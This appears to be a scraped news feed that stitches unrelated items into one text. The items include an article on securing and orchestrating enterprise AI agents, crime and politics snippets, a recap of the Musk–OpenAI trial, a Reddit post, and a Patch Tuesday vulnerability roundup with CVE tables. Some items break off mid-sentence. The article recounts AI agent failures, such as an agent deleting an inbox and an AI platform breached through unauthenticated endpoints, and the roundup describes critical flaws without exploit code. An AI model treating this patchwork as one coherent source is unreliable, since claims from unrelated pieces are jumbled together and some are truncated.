Many customers use Trans Union's data but do not use other solutions and platforms, says Achanta. The new orchestration agent has the potential to help customers get more value out of data and open up new revenue streams for the company. And more agents are on the way, says Achanta. The key to making them work is the orchestration, governance and security layers. Just getting an agent to do something is very easy for anyone, he says, and can take just a few days. The company can also create agents quickly. – But I have the foundation and guardrails, and the agent that sits on my platform uses them all, he says. That is what gives us power. The secret to getting AI agents to behave is to separate the layers of the task and assign each layer to a different system, with each system operating under a set of constraints. This strategy limits the damage a single agent can do, creates a system of checks and balances, and confines the riskiest activities to a pre-generative AI technology. At Trans Union, for example, the core decision-making happens through an updated version of an expert system. It works according to a set of well-defined, auditable rules and operates predictably, cost-effectively and with low latency. When it encounters a situation it has not seen before, an LLM is used to analyze the problem, another agent can then convert it into a new rule, and after that a human can be called in to review the results before the new rule is added to the expert system. There are different agents that understand the semantic layer, interact with humans and perform other tasks. – With the neural reasoning layer, the LLM, we involve humans in the process, he says. When it comes to the symbolic reasoning layer, which is logic- and machine learning-driven, we let it be automated.
So when each agent works within very narrow bounds, with only the limited data it needs for that particular task, and is restricted in what it can do, the whole system becomes much more manageable and reliable. It is like the difference between an assembly line, where several workers each perform a single, distinct task, and a workshop where a single craftsman does everything. The assembly line can do the work faster and more reliably, but today many companies use their AI agents as if they were craftsmen. The latter approach can result in creative, unique products, but this is not always what a company needs. Nicholas Mattei, chair of ACM's special interest group on AI and professor at Tulane University, thinks companies should focus on building in extra security at the points where different parts of the agent system connect to each other. – Make sure you have security in the seams, he says. If, for example, an agent sends requests to an email service, you should set up a checkpoint between the two. – Around the gaps between the untrusted agents and where the traditional software is, that is where you want to focus your security processes, he says.
Building a security foundation for agentic AI
In a Jitterbit survey of 1,500 IT managers published in March, AI accountability (security, auditability, traceability and guardrails) is the most important factor in the final AI purchasing decision, ahead of implementation speed, vendor reputation and even TCO. Security, governance and data privacy risks were also the top issues preventing AI initiatives from going into production, ahead of costs and integration challenges. And companies are right to be worried. Earlier this year, researchers at the cybersecurity company Code Wall managed to break into McKinsey's new AI platform, Lilli.
Using an AI tool of their own, the researchers said they were able to gain access to 47 million chat messages, 728,000 files, 384,000 AI assistants, 94,000 workspaces, 217,000 agent messages, nearly 4 million RAG document chunks, and 95 system prompts and AI model configurations. "This is decades of McKinsey's own research, frameworks and methods – the company's intellectual crown jewels sitting in a database that anyone can read," the researchers wrote. The reason? Of more than 200 publicly exposed API endpoints, 22 required no authentication. It took the researchers just two hours to gain full read and write access to Lilli's entire production database. McKinsey responded quickly to the alert, fixed the unauthenticated endpoints and took other security measures. "Our investigation, which was supported by a leading external forensics firm, found no evidence that client data or confidential client information had come into the hands of this researcher or any other unauthorized third party," the company said in a statement. IDC says the incident underscores how dangerous a breach of an AI system can be for a company. – Most companies still think of AI risks in yesterday's terms: data leakage, incorrect results and damage to the brand's reputation, says Alessandro Perilli, IDC's vice president of AI research. Those are serious problems, but the bigger risk becomes delegating authority to AI systems. By gaining access to an agentic AI platform, an attacker can not only see something they should not see, but also secretly change how the company acts. And securing enterprise-scale agentic AI systems like Lilli is only half the challenge. According to Gartner, 69 percent of organizations suspect that employees are using prohibited AI tools, and 40 percent will suffer security or compliance incidents by 2030 as a result. But the available discovery tools are not quite ready to find AI agents, says Gartner.
– If I asked you how many agents are running in your company right now, where would you go to check? asks Swaminathan Chandrasekaran, global head of AI and data labs at KPMG, which now has several thousand AI agents in production. – Have they all been integrated and do they have identities? Have they gone through a proper authentication process and who is responsible for them? That part of the infrastructure does not exist. Tools are starting to appear, however, or companies are creating their own solutions, he says. – That is what will give CIOs peace of mind. We are already seeing public examples of individual employees using powerful agentic AI with negative consequences. Summer Yue, Meta's alignment director, recently decided to use Open Claw, a viral open-source agentic AI tool, to manage her inbox. After it worked in a test inbox, she deployed it for real. "Nothing makes you as humble as asking Open Claw to confirm before it acts and then watching it quickly delete the entire inbox," she wrote on X. "I could not stop it from my phone. I had to run to my Mac mini as if I were defusing a bomb." Previously, an employee could upload sensitive information to a chatbot or ask it to write a report that they then copied and pasted and passed off as their own. As these chatbots evolve into full-fledged agentic systems, the agents now have the ability to do everything a user is authorized to do, including accessing corporate systems. To manage this new security risk, companies must move from role- and identity-based controls to intent-based ones, says Rakesh Malhotra, head of digital and emerging technologies at EY. It is not enough to ask whether an agent is authorized to access a system to make a change to a record, he says. Companies must be able to ask why you are changing this. That is a big challenge right now.
– The observability stack does not capture the intent behind why the agent did something, he says. And that is really important to understand. Trust is built on intent, and there is no way for any of these systems to capture intent. If a human employee tried to refactor the entire codebase, they would be asked to give a good reason for it. – And if you are refactoring for no specific reason, maybe you should not be doing it, says Malhotra. When it comes to humans, there are ways to determine this. I do not know how to do it with agents.
Building a semantic data foundation for agentic AI
Achanta of Trans Union repeatedly mentions the semantic foundation of the company's One Tru platform. Such an understanding of information helps systems understand not only what data is, but also what it means and how it relates to other data. Gartner says that developing a semantic layer is now a must for companies implementing AI. "It is the only way to improve accuracy, manage costs, significantly reduce AI debt, coordinate multi-agent systems and stop costly inconsistencies before they spread," says the analyst firm. Gartner predicts that by 2030 universal semantic layers will be regarded as critical infrastructure, on a par with data platforms and cybersecurity. And agents need context to be able to do anything meaningful with data, says KPMG's Chandrasekaran. That is where the company's knowledge lives. – It is the company's new intangible asset, he says. Context is the new moat. For John Arsneault, CIO at Goulston & Storrs, creating a solid data foundation is also a way to avoid vendor lock-in. – If you buy things and move your data into them to create automated workflows or agentic work assistants, you will have a hard time getting out of it, he says.
But if you choose a data-centric strategy, you can at least switch from one to the other if the market changes. The law firm has migrated its client-facing work products to Net Documents, a document management system specifically aimed at the legal industry. And the rest of the data the firm collects ends up in Entegrata's legal data lakehouse. – Our goal is for all our other applications to eventually point to that data store, he says. Then we will have these two environments where all the firm's data lives, which lets us put whatever AI tool we use on top. It will also make data flows easier to manage, he adds, and enable the firm to adapt quickly to whatever AI technology comes next. – Whether it is generative AI, agentic AI or Anthropic technology, it is very hard to keep up with the Cowork plugin for legal, he says. And it changes every six months.
Agentic orchestration
The last piece of the agentic infrastructure puzzle, after security barriers have been put in place and a usable data layer has been created, is orchestration. Agentic AI systems require agents to communicate with each other and with human users, and to interact with data sources and tools. It is a complicated challenge, and this technology is still in its infancy, although it is developing rapidly. MCP is one such example and is an important piece in solving the orchestration puzzle. AI vendors have been remarkably willing to cooperate here. – When social networks were born and Facebook and Twitter discussed a standard protocol for interaction, nobody wanted to adopt the competitors' protocols, says Agustin Huerta, head of digital innovation and technology at Globant, a digital transformation company. Now everyone goes through MCP and it is becoming more mature as a standard protocol. But that does not mean agent integration is solved.
According to a Docker survey of more than 800 IT decision-makers and developers, the operational complexity of orchestrating multiple components is the biggest challenge in building agents. In particular, 37 percent of respondents say orchestration frameworks are too fragile or immature for production use, and 30 percent report gaps in testing and visibility in complex orchestrations. In addition, although 85 percent of teams are familiar with MCP, most say there are significant problems with security, configuration and manageability that prevent deployment in production. And there are other integration problems that companies must deal with. – One problem that has not yet been solved is how to get a proper dashboard to govern all these agents, to know exactly what is happening with each of them, says Huerta. – One dashboard lets you monitor agents built with Open AI, and one is for agents that live on Salesforce, but none can show telemetry in a central dashboard for control, auditing and logging. For companies that have just started implementing agents, or that stick to a single platform, this is not yet a problem, he adds, but when they make use of a larger network of agents they will start to experience the challenges. Globant, for example, is building its own internal control panel for agentic AI. And at Brownstein Hyatt Farber Schreck, a 50-year-old law firm with about 700 employees and clients across the US, there are several areas where AI is used, including a system for generating proposals. Normally it can take several people several days to review a client's request for proposal, go through handwritten notes or meeting minutes and compile other relevant material, says Andrew Johnson, the firm's head of IT. – We can feed all that information into a computer and extract key criteria to produce a high-quality first draft in a few minutes, he says.
Several agents are needed for different parts of the process: one to extract success criteria or staffing needs, one to look for previous cases and lessons learned, and others for pricing and brand standards. – Each of these agents is autonomous and must be coordinated so that the output of each agent feeds into the next step, says Johnson. For the most part that means a RAG system, since most of the older platforms the firm uses have not yet integrated an MCP layer. Depending on the task, individual agents may be powered by different models, which is another coordination layer that must be managed. Then there is cost monitoring. If an AI agent or a group of agents ends up in an infinite feedback loop, inference costs can rise quickly. – We are aware of the problem, although we have not yet seen it occur, says Johnson. So we have monitoring in place. If we exceed the thresholds, we respond to it. Regardless of strategies or measures for handling setbacks, everything to do with AI is changing faster than anything else companies have seen before. – I have worked with technology for 25 years and I have never seen anything like it, says EY's Malhotra. The fastest-growing companies in corporate history have all been created in the past three to four years. The growth in usage is completely unprecedented. And I talk all the time with clients who are implementing technologies that were highly relevant nine or ten months ago, and everyone has moved on.
Article URL: https://arxiv.org/abs/2605.08419 Comments URL: https://news.ycombinator.com/item?id=48117810 Points: 274 # Comments: 64
An island in southern Argentina is being singled out as "ground zero" for the hantavirus outbreak. But the claims are rejected by the province's director general for epidemiology and environmental health. – We have never previously recorded cases of hantavirus, Juan Facundo Petrina tells the BBC.
In early 2025, five pupils were suspended from the boarding school Lundsberg after being reported to the police by the school for assault. One of them was the son of entrepreneur Gunilla von Platen. The incident led the son to begin talking about the violence and racism he himself had been subjected to during his years at the school. – As a mother, you break down inside, she says in Dokument inifrån: Arvtagarna.
Chinese satellite imagery firm MizarVision, which rose to fame with its analysis of American military deployments in the US-Israel war on Iran, is treating its addition to the US sanctions list as a badge of honour in its hiring campaign. The open-source intelligence (OSINT) start-up, formally known as Meentropy Technology Hangzhou Co Ltd, specialises in analysing data from commercial satellites and has conducted several observations of US military movements in recent months. It was added to the...
From Obama’s evening chats on Yingtai island in the grounds of Zhongnanhai to Trump’s tea reception in the Forbidden City, historic settings have long formed a symbolic backdrop to key moments in US-China diplomacy. As Trump prepares for his visit to China from Wednesday to Friday – the first by an American president in almost nine years – all eyes will not only be on the summit agenda, but also on the carefully choreographed details surrounding the reception, including sites featured in the...
Communist government plans personalized ‘data-driven decision-making based on real-time information’ by 2035
21-year-old Ali Namdar from Katrineholm has been detained in absentia by five district courts, suspected of having directed a series of serious violent crimes around Sweden from abroad. According to SVT's sources, he belongs to the top tier of the criminal Foxtrot network. He is now being hunted internationally and is one of the highest priorities on Europol's list of wanted persons.
Poya Shafie, one of the very closest associates of Rawa "the Kurdish Fox" Majid, is considered by police and prosecutors to be linked to the chat alias "Hamado". SVT has now been able to trace "Hamado's" direct involvement in the preparations for several attempted murders and planned murders in Sundsvall and Stockholm during 2022 and 2023.
12-year-old Alin and her little sister are to be deported to Syria after having lived in Umeå for six years. Now Södra Ålidhemsskolan has taken up the fight for the family to be allowed to stay. With a petition, the school wants to stop the Swedish Migration Agency's decision. – They have always been there for me. I am very grateful for that, says Alin Haje Mostafa.
Gothenburg subsidizes public transport while the region raises the ticket price. Now the red-green administration is demanding a price freeze in Västra Götaland.
OpenAI CEO Sam Altman took the stand Tuesday in Elon Musk's trial against the company, testifying that Musk repeatedly sought control of OpenAI before leaving in 2018. Altman said he opposed putting AI "under the control of any one person," while Musk's lawyer used a pointed cross-examination to attack Altman's trustworthiness. An anonymous reader shares updates from the testimony via the New York Times: Before Elon Musk left OpenAI in a power struggle in 2018, he wanted to merge the nonprofit artificial intelligence lab with Tesla, his electric car company. Mr. Musk and other OpenAI co-founders met several times to discuss the merger. OpenAI's chief executive, Sam Altman, was even offered a seat on Tesla's board of directors, according to a court document. But folding OpenAI into Tesla would have eliminated the lab's nonprofit status, and that, Mr. Altman said on the witness stand on Tuesday, was something he wanted to avoid. [...] "I believed that A.I. should not be under the control of any one person," Mr. Altman said. [...] Mr. Altman testified about his feud with Mr. Musk. He said he had become worried that Mr. Musk, who provided the early investment money for OpenAI, wanted to take control of the lab. He described what he called a "particularly harrowing moment" when his OpenAI co-founders asked Mr. Musk what would happen to his control of a potential for-profit when he died. Mr. Altman said Mr. Musk had replied that the control would pass to his children. "I was not comfortable with that," Mr. Altman said. When Mr. Musk lost a power struggle for control of the lab, he left, forcing Mr. Altman to find another big financial backer in Microsoft. But Mr. Altman ran into trouble in 2023 when OpenAI's board fired him because, as several of its members have testified in the trial, it didn't trust him. Steven Molo, Mr. Musk's lead lawyer, homed in on Mr. Altman's trustworthiness during an aggressive cross-examination.
"Are you completely trustworthy?" Mr. Molo asked. "I believe so," Mr. Altman answered. After questioning Mr. Altman's trustworthiness for nearly 20 minutes, Mr. Molo turned to Mr. Altman's relationship with Mr. Musk. Mr. Altman said that after he met Mr. Musk in the mid-2010s, Mr. Musk had occasionally expressed concern about the dangers of A.I. But Mr. Musk spent far more time saying he was worried that companies like Google would get ahead in A.I. development, Mr. Altman said. (Mr. Musk testified in the trial that he had wanted to create OpenAI to prevent Google from controlling the technology.) Mr. Altman, the lawyer intimated, took advantage of Mr. Musk's concerns and was never sincere about his own A.I. fears. "Are you a person who just tells people things they want to hear whether those things are true or not?" Mr. Molo asked. The lawyer also questioned whether Mr. Altman, who became a billionaire through years of tech investments, was self-dealing through OpenAI. Mr. Molo showed a list of Mr. Altman's personal investments across a number of companies that stand to benefit from their association with OpenAI. They included Helion Energy, a start-up that has deals with Microsoft and OpenAI, and Cerebras, a chip maker in business with OpenAI. Mr. Molo asked if Mr. Altman, who is on OpenAI's board as well as its chief executive, would ever fire himself. "I have no plans to do that," Mr. Altman said. OpenAI's odd journey from nonprofit lab to what it is today -- a well-funded, for-profit company that is still connected to a nonprofit called the OpenAI Foundation with an endowment that could be worth more than $130 billion -- provided grist for Mr. Molo's questions about Mr. Altman's motivations. He implied that Mr. Altman could have continued to build OpenAI as a pure nonprofit. But the only way to build such a valuable charity was to raise billions through a for-profit venture, Mr. Altman responded. Still, the giant sums being raised appeared to upset Mr. Musk.
In late 2022, according to court documents, Mr. Musk sent a text to Mr. Altman complaining that Microsoft was preparing to invest $10 billion in OpenAI. "This is a bait and switch," Mr. Musk said at the time. But Mr. Altman, under questioning from his own lawyers, said: "Every step of the way, I have done my best to maximize the value of the nonprofit. I would point out that there are not a lot of historical examples of a nonprofit at this scale." Before Altman took the stand, OpenAI board chair Bret Taylor continued his testimony that began on Monday. He said Elon Musk's 2024 bid to buy the company's assets appeared to conflict with his lawsuit and was rejected because the board did not believe OpenAI's mission should be controlled by one person. "We did not feel like it was appropriate for one person to control our mission," he said. Recap: Microsoft CEO Satya Nadella Testifies In OpenAI Trial (Day Nine) Sam Altman Had a Bad Day In Court (Day Eight) Sam Altman's Management Style Comes Under the Microscope At OpenAI Trial (Day Seven) Brockman Rebuts Musk's Take On Startup's History, Recounts Secret Work For Tesla (Day Six) OpenAI President Discloses His Stake In the Company Is Worth $30 Billion (Day Five) Musk Concludes Testimony At OpenAI Trial (Day Four) Elon Musk Says OpenAI Betrayed Him, Clashes With Company's Attorney (Day Three) Musk Testifies OpenAI Was Created As Nonprofit To Counter Google (Day Two) Elon Musk and OpenAI CEO Sam Altman Head To Court (Day One) Read more of this story at Slashdot.
Hey guys, Left my old company 1 month ago, really nice place tbh, just decided to keep progressing in my career. Yesterday a former colleague of mine, really nice dude, reached out to me, initially asking about how I was doing.. personal stuff, and then he dropped the bombshell, asking me about where to find specific information for work. It was a quick back and forth sms, I provided the answer and stopped replying. However he kept sending me screenshot after screenshot about the same issue and I simply ignored them. Today he reached out again asking if we can have a quick call to discuss some networking stuff I left behind. Now, I am more than happy to provide a quick consult but I'd be charging for that. The thing is, it's my colleague who's reaching out, not my former employer. If that's the case, how should I handle this? How should I reply back? I like the company, they are nice dudes, and I don't wanna burn any bridges, but I also want to put a foot down and demand time/money for my consults. Mind you I don't have a 'company' under my name :( submitted by /u/Qvosniak
Police followed mobile phone traces: three men charged with burglary (Alingsås Tidning)
As suits say they're burning cash on brainboxes without seeing results
Accounting firm data breach.
That price tag is nearly seven times higher than Trump's initial estimate, an independent budget office found.
After the Louisiana Purchase from France in 1803, which almost doubled the size of the United States’ territory, US president Thomas Jefferson commissioned the legendary Lewis and Clark expedition, which surveyed new routes from the Missouri river to the Pacific coast. It also carried out work in agriculture, ethnography (with indigenous peoples) and geography. Throughout the 19th and early 20th centuries, that was the kind of science the US government was willing to pay for – practical,...
Article URL: https://www.spacex.com/updates#starship-v3 Comments URL: https://news.ycombinator.com/item?id=48116781 Points: 291 # Comments: 512
.. if “unproxyable” is a word that is ..
Beijing intensified security and prepared key venues on Tuesday as the Chinese capital awaited the arrival of US President Donald Trump and his high-stakes talks with Chinese President Xi Jinping later this week. Trump is expected to stay at the five-star Four Seasons Hotel in northeastern Beijing after arriving on Wednesday night. His delegation is expected to stay at the nearby Kempinski Hotel Beijing Yansha Centre. While neither country has officially disclosed the delegation’s lodging, rooms...
Wine's Wayland native driver has taken another step forward and now supports the pointer warp "wp_pointer_warp_v1" protocol...
Collins shared late last year that he had been diagnosed with an aggressive form of brain cancer.
There is no governmental mechanism to pay for an AI agent that monitors a patient between visits, calls to check in, coordinates a housing referral, or makes sure someone picks up their medication. ACCESS creates that mechanism for the first time.
[AI generated] NTN Bearing Corporation of America is a US-based subsidiary of Japan's NTN Corporation, operating in the industrial manufacturing sector. The company produces and distributes precision bearings, driveshafts, and related mechanical components used in automotive, aerospace, and industrial machinery applications. Headquartered in Mount Prospect, Illinois, it serves customers across North America with engineering support and distribution services.
Microsoft is publishing 137 vulnerabilities on May 2026 Patch Tuesday. Microsoft is not aware of exploitation in the wild or public disclosure for any of these vulnerabilities. So far this month, Microsoft has provided patches to address 133 browser vulnerabilities, which are not included in the Patch Tuesday count above.

Windows Netlogon: critical RCE

Anyone responsible for securing a domain controller should prioritize remediation of CVE-2026-41089, which is a critical stack-based buffer overflow in Windows Netlogon with a CVSS v3 base score of 9.8. Exploitation leads to execution in the context of the Netlogon service, so that’s SYSTEM privileges on the domain controller. For most pentesters, that’s the point at which the customer report more or less writes itself. No privileges or user interaction are required, and attack complexity is low, which suggests that creation of a reliable exploit might not be especially difficult for anyone with knowledge of the specific mechanism.

Microsoft assesses exploitation as less likely, but since those exploitability assessments are provided without an accompanying explanation, it’s not clear how much reassurance defenders should take. Anyone who remembers the much-discussed CVE-2020-1472 (aka ZeroLogon) back in 2020 will note that CVE-2026-41089 offers an attacker more immediate control of a domain controller. Patches are available for all versions of Windows Server from 2012 onwards.

Windows DNS Client: critical RCE

An attacker looking for a master key for Windows assets will pay attention to CVE-2026-41096, a critical RCE in the Windows DNS client implementation. A modern computer talks to DNS the way a child in the back of a car asks “are we there yet?” The variable and complex structure of DNS responses means that DNS client implementations are also complex and thus prone to flaws.

Microsoft assesses exploitation as less likely, and we can hope that modern mitigations such as heap address randomization and optional-but-recommended encrypted channel DNS will make weaponization significantly more challenging by putting barriers across specific paths to exploitation. The DNS client on Windows runs as the NetworkService role, rather than SYSTEM, but a foothold is a foothold, and skilled attackers expect to chain exploits together.

JIRA/Confluence Entra ID auth plugin: critical EoP

If you’re still self-hosting Atlassian JIRA or Confluence and relying on the Microsoft Entra ID authentication plugin, you’ll want to know about CVE-2026-41103. This critical elevation of privilege vulnerability allows an unauthorized attacker to impersonate an existing user by presenting forged credentials, thus bypassing Entra ID. Microsoft expects that exploitation is more likely. Even if you can’t always find what you want on the corporate Confluence, a motivated attacker probably will. Curiously, the patch links on the advisory lead to older versions of the plugins published in 2024.

Microsoft WARP team

Microsoft’s WARP team is credited with multiple critical vulnerabilities today, after making their first appearance in MSRC advisory acknowledgements in last month’s Patch Tuesday. We can speculate that they likely know a great deal about the current state of AI-powered vulnerability research as it applies to Microsoft products.

Microsoft lifecycle update

There are no significant Microsoft product lifecycle changes this month.
Microsoft .NET 9 STS (Standard Term Support, as distinct from Long Term Support) was originally scheduled to move past the end of support in May 2026, but late last year, Microsoft granted a six-month extension, so that .NET 9 STS now reaches end of support on November 10, 2026.

Summary tables

Apps vulnerabilities

CVE | Title | Exploitation status | Publicly disclosed? | CVSS v3 base score
CVE-2026-26129 | M365 Copilot Information Disclosure Vulnerability | N/A | No | 7.5
CVE-2026-26164 | M365 Copilot Information Disclosure Vulnerability | Exploitation Less Likely | No | 7.5
CVE-2026-41614 | M365 Copilot for Desktop Spoofing Vulnerability | Exploitation Less Likely | No | 6.2
CVE-2026-41100 | Microsoft 365 Copilot for Android Spoofing Vulnerability | Exploitation Unlikely | No | 4.4
CVE-2026-42832 | Microsoft Office Spoofing Vulnerability | Exploitation Unlikely | No | 7.7
CVE-2026-41101 | Microsoft Word for Android Spoofing Vulnerability | Exploitation Unlikely | No | 7.1

Azure vulnerabilities

CVE | Title | Exploitation status | Publicly disclosed? | CVSS v3 base score
CVE-2026-35435 | Azure AI Foundry Elevation of Privilege Vulnerability | Exploitation More Likely | No | 8.6
CVE-2026-35428 | Azure Cloud Shell Spoofing Vulnerability | N/A | No | 9.6
CVE-2026-32207 | Azure Machine Learning Notebook Spoofing Vulnerability | n/a | No | 8.8
CVE-2026-33109 | Azure Managed Instance for Apache Cassandra Remote Code Execution Vulnerability | N/A | No | 9.9
CVE-2026-33844 | Azure Managed Instance for Apache Cassandra Remote Code Execution Vulnerability | N/A | No | 9.0
CVE-2026-41105 | Azure Monitor Action Group Notification System Elevation of Privilege Vulnerability | N/A | No | 8.1
CVE-2026-40379 | Microsoft Enterprise Security Token Service (ESTS) Spoofing Vulnerability | N/A | No | 9.3
CVE-2026-34327 | Microsoft Partner Center Spoofing Vulnerability | N/A | No | 8.2
CVE-2026-40381 | Azure Connected Machine Agent Elevation of Privilege Vulnerability | Exploitation Less Likely | No | 7.8
CVE-2026-42823 | Azure Logic Apps Elevation of Privilege Vulnerability | Exploitation Less Likely | No | 9.9
CVE-2026-33833 | Azure Machine Learning Notebook Spoofing Vulnerability | Exploitation Less Likely | No | 8.2
CVE-2026-32204 | Azure Monitor Agent Elevation of Privilege Vulnerability | Exploitation Less Likely | No | 7.8
CVE-2026-42830 | Azure Monitor Agent Metrics Extension Elevation of Privilege Vulnerability | Exploitation Less Likely | No | 6.5
CVE-2026-33117 | Azure SDK for Java Security Feature Bypass Vulnerability | Exploitation Unlikely | No | 9.1
CVE-2026-41103 | Microsoft SSO Plugin for Jira & Confluence Elevation of Privilege Vulnerability | Exploitation More Likely | No | 9.1
CVE-2026-41086 | Windows Admin Center in Azure Portal Elevation of Privilege Vulnerability | Exploitation Less Likely | No | 8.8

Browser vulnerabilities

CVE | Title | Exploitation status | Publicly disclosed? | CVSS v3 base score
CVE-2026-7898 | Chromium: CVE-2026-7898 Use after free in Chromoting | n/a | No |
CVE-2026-7899 | Chromium: CVE-2026-7899 Out of bounds read and write in V8 | n/a | No |
CVE-2026-7900 | Chromium: CVE-2026-7900 Heap buffer overflow in ANGLE | n/a | No |
CVE-2026-7901 | Chromium: CVE-2026-7901 Use after free in ANGLE | n/a | No |
CVE-2026-7902 | Chromium: CVE-2026-7902 Out of bounds memory access in V8 | n/a | No |
CVE-2026-7903 | Chromium: CVE-2026-7903 Integer overflow in ANGLE | n/a | No |
CVE-2026-7904 | Chromium: CVE-2026-7904 Out of bounds read in Fonts | n/a | No |
CVE-2026-7906 | Chromium: CVE-2026-7906 Use after free in SVG | n/a | No |
CVE-2026-7907 | Chromium: CVE-2026-7907 Use after free in DOM | n/a | No |
CVE-2026-7908 | Chromium: CVE-2026-7908 Use after free in Fullscreen | n/a | No |
CVE-2026-7909 | Chromium: CVE-2026-7909 Inappropriate implementation in ServiceWorker | n/a | No |
CVE-2026-7910 | Chromium: CVE-2026-7910 Use after free in Views | n/a | No |
CVE-2026-7911 | Chromium: CVE-2026-7911 Use after free in Aura | n/a | No |
CVE-2026-7914 | Chromium: CVE-2026-7914 Type Confusion in Accessibility | n/a | No |
CVE-2026-7916 | Chromium: CVE-2026-7916 Insufficient data validation in InterestGroups | n/a | No |
CVE-2026-7917 | Chromium: CVE-2026-7917 Use after free in Fullscreen | n/a | No |
CVE-2026-7918 | Chromium: CVE-2026-7918 Use after free in GPU | n/a | No |
CVE-2026-7919 | Chromium: CVE-2026-7919 Use after free in Aura | n/a | No |
CVE-2026-7920 | Chromium: CVE-2026-7920 Use after free in Skia | n/a | No |
CVE-2026-7921 | Chromium: CVE-2026-7921 Use after free in Passwords | n/a | No |
CVE-2026-7922 | Chromium: CVE-2026-7922 Use after free in ServiceWorker | n/a | No |
CVE-2026-7923 | Chromium: CVE-2026-7923 Out of bounds write in Skia | n/a | No |
CVE-2026-7924 | Chromium: CVE-2026-7924 Uninitialized Use in Dawn | n/a | No |
CVE-2026-7925 | Chromium: CVE-2026-7925 Use after free in Chromoting | n/a | No |
CVE-2026-7926 | Chromium: CVE-2026-7926 Use after free in PresentationAPI | n/a | No |
CVE-2026-7927 | Chromium: CVE-2026-7927 Type Confusion in Runtime | n/a | No |
CVE-2026-7928 | Chromium: CVE-2026-7928 Use after free in WebRTC | n/a | No |
CVE-2026-7929 | Chromium: CVE-2026-7929 Use after free in MediaRecording | n/a | No |
CVE-2026-7930 | Chromium: CVE-2026-7930 Insufficient validation of untrusted input in Cookies | n/a | No |
CVE-2026-7932 | Chromium: CVE-2026-7932 Insufficient policy enforcement in Downloads | n/a | No |
CVE-2026-7933 | Chromium: CVE-2026-7933 Out of bounds read in WebCodecs | n/a | No |
CVE-2026-7934 | Chromium: CVE-2026-7934 Insufficient validation of untrusted input in Popup Blocker | n/a | No |
CVE-2026-7935 | Chromium: CVE-2026-7935 Inappropriate implementation in Speech | n/a | No |
CVE-2026-7936 | Chromium: CVE-2026-7936 Object lifecycle issue in V8 | n/a | No |
CVE-2026-7937 | Chromium: CVE-2026-7937 Insufficient policy enforcement in DevTools | n/a | No |
CVE-2026-7938 | Chromium: CVE-2026-7938 Use after free in CSS | n/a | No |
CVE-2026-7939 | Chromium: CVE-2026-7939 Inappropriate implementation in SanitizerAPI | n/a | No |
CVE-2026-7940 | Chromium: CVE-2026-7940 Use after free in V8 | n/a | No |
CVE-2026-7942 | Chromium: CVE-2026-7942 Integer overflow in ANGLE | n/a | No |
CVE-2026-7943 | Chromium: CVE-2026-7943 Insufficient validation of untrusted input in ANGLE | n/a | No |
CVE-2026-7944 | Chromium: CVE-2026-7944 Insufficient validation of untrusted input in Persistent Cache | n/a | No |
CVE-2026-7945 | Chromium: CVE-2026-7945 Insufficient validation of untrusted input in COOP | n/a | No |
CVE-2026-7946 | Chromium: CVE-2026-7946 Insufficient policy enforcement in WebUI | n/a | No |
CVE-2026-7947 | Chromium: CVE-2026-7947 Insufficient validation of untrusted input in Network | n/a | No |
CVE-2026-7948 | Chromium: CVE-2026-7948 Race in Chromoting | n/a | No |
CVE-2026-7949 | Chromium: CVE-2026-7949 Out of bounds read in Skia | n/a | No |
CVE-2026-7950 | Chromium: CVE-2026-7950 Out of bounds read and write in GFX | n/a | No |
CVE-2026-7951 | Chromium: CVE-2026-7951 Out of bounds write in WebRTC | n/a | No |
CVE-2026-7952 | Chromium: CVE-2026-7952 Insufficient policy enforcement in Extensions | n/a | No |
CVE-2026-7953 | Chromium: CVE-2026-7953 Insufficient validation of untrusted input in Omnibox | n/a | No |
CVE-2026-7954 | Chromium: CVE-2026-7954 Race in Shared Storage | n/a | No |
CVE-2026-7955 | Chromium: CVE-2026-7955 Uninitialized Use in GPU | n/a | No |
CVE-2026-7956 | Chromium: CVE-2026-7956 Use after free in Navigation | n/a | No |
CVE-2026-7957 | Chromium: CVE-2026-7957 Out of bounds write in Media | n/a | No |
CVE-2026-7958 | Chromium: CVE-2026-7958 Inappropriate implementation in ServiceWorker | n/a | No |
CVE-2026-7959 | Chromium: CVE-2026-7959 Inappropriate implementation in Navigation | n/a | No |
CVE-2026-7960 | Chromium: CVE-2026-7960 Race in Speech | n/a | No |
CVE-2026-7961 | Chromium: CVE-2026-7961 Insufficient validation of untrusted input in Permissions | n/a | No |
CVE-2026-7962 | Chromium: CVE-2026-7962 Insufficient policy enforcement in DirectSockets | n/a | No |
CVE-2026-7963 | Chromium: CVE-2026-7963 Inappropriate implementation in ServiceWorker | n/a | No |
CVE-2026-7964 | Chromium: CVE-2026-7964 Insufficient validation of untrusted input in FileSystem | n/a | No |
CVE-2026-7965 | Chromium: CVE-2026-7965 Insufficient validation of untrusted input in DevTools | n/a | No |
CVE-2026-7966 | Chromium: CVE-2026-7966 Insufficient validation of untrusted input in SiteIsolation | n/a | No |
CVE-2026-7967 | Chromium: CVE-2026-7967 Insufficient validation of untrusted input in Navigation | n/a | No |
CVE-2026-7968 | Chromium: CVE-2026-7968 Insufficient validation of untrusted input in CORS | n/a | No |
CVE-2026-7969 | Chromium: CVE-2026-7969 Integer overflow in Network | n/a | No |
CVE-2026-7970 | Chromium: CVE-2026-7970 Use after free in TopChrome | n/a | No |
CVE-2026-7971 | Chromium: CVE-2026-7971 Inappropriate implementation in ORB | n/a | No |
CVE-2026-7972 | Chromium: CVE-2026-7972 Uninitialized Use in GPU | n/a | No |
CVE-2026-7973 | Chromium: CVE-2026-7973 Integer overflow in Dawn | n/a | No |
CVE-2026-7974 | Chromium: CVE-2026-7974 Use after free in Blink | n/a | No |
CVE-2026-7975 | Chromium: CVE-2026-7975 Use after free in DevTools | n/a | No |
CVE-2026-7976 | Chromium: CVE-2026-7976 Use after free in Views | n/a | No |
CVE-2026-7977 | Chromium: CVE-2026-7977 Inappropriate implementation in Canvas | n/a | No |
CVE-2026-7978 | Chromium: CVE-2026-7978 Inappropriate implementation in Companion | n/a | No |
CVE-2026-7979 | Chromium: CVE-2026-7979 Inappropriate implementation in Media | n/a | No |
CVE-2026-7980 | Chromium: CVE-2026-7980 Use after free in WebAudio | n/a | No |
CVE-2026-7981 | Chromium: CVE-2026-7981 Out of bounds read in Codecs | n/a | No |
CVE-2026-7982 | Chromium: CVE-2026-7982 Uninitialized Use in WebCodecs | n/a | No |
CVE-2026-7983 | Chromium: CVE-2026-7983 Out of bounds read in Dawn | n/a | No |
CVE-2026-7984 | Chromium: CVE-2026-7984 Use after free in ReadingMode | n/a | No |
CVE-2026-7985 | Chromium: CVE-2026-7985 Use after free in GPU | n/a | No |
